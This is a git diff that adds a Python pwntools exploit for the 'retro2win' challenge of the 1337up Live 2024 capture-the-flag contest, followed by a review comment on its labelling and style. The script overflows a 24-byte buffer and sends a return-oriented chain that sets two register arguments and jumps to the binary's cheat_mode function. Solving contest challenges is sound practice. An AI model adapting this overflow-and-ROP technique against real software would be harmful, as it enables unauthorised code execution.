diff --git a/1337up_live_2024/retro2win/a.py b/1337up_live_2024/retro2win/a.py
new file mode 100644
index 0000000..760a578
--- /dev/null
+++ b/1337up_live_2024/retro2win/a.py
@@ -0,0 +1,27 @@
+#!/usr/bin/python3
+
+from pwn import *
+
+context.binary = target = ELF("./retro2win", checksec=False)
+# r = process()
+r = remote("retro2win.ctf.intigriti.io", 1338)
+
+# funcs
+s = lambda a: r.sendlineafter(b":", a)
+
+# gadgets
+pop_rdi = 0x4009b3
+pop_rsi_r15 = 0x4009b1
+
+# leak
+s(b"1337")
+buf = b"A"*24
+buf += p64(pop_rdi)
+buf += p64(0x2323232323232323)
+buf += p64(pop_rsi_r15)
+buf += p64(0x4242424242424242)
+buf += p64(0)
+buf += p64(target.sym.cheat_mode)
+s(buf)
+
+r.interactive()
\ No newline at end of file
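Review bot: The `# leak` heading above `s(b"1337")` is misleading — nothing is read back from the target in that block; it assembles a return-oriented chain that pops two values into rdi and rsi and then returns into `target.sym.cheat_mode`, so a heading such as `# ret2win: return into cheat_mode with two register arguments` would describe what the lines actually do. The 24-byte `b"A"*24` padding and the two 0x2323…/0x4242… constants are undocumented magic values; a one-line comment on each stating where it came from (the padding presumably being the distance to the saved return address and the constants presumably the values cheat_mode checks — neither is verifiable from this hunk) would let a reader audit the script without re-disassembling the binary, and the same applies to the hard-coded `pop_rdi`/`pop_rsi_r15` addresses, which unlike `cheat_mode` are not resolved from the ELF and will silently go stale if the binary is rebuilt. Minor style points: `s = lambda a: ...` should be a `def` (PEP 8 E731), `from pwn import *` hides where `ELF`, `remote` and `p64` come from, and the file lacks a trailing newline.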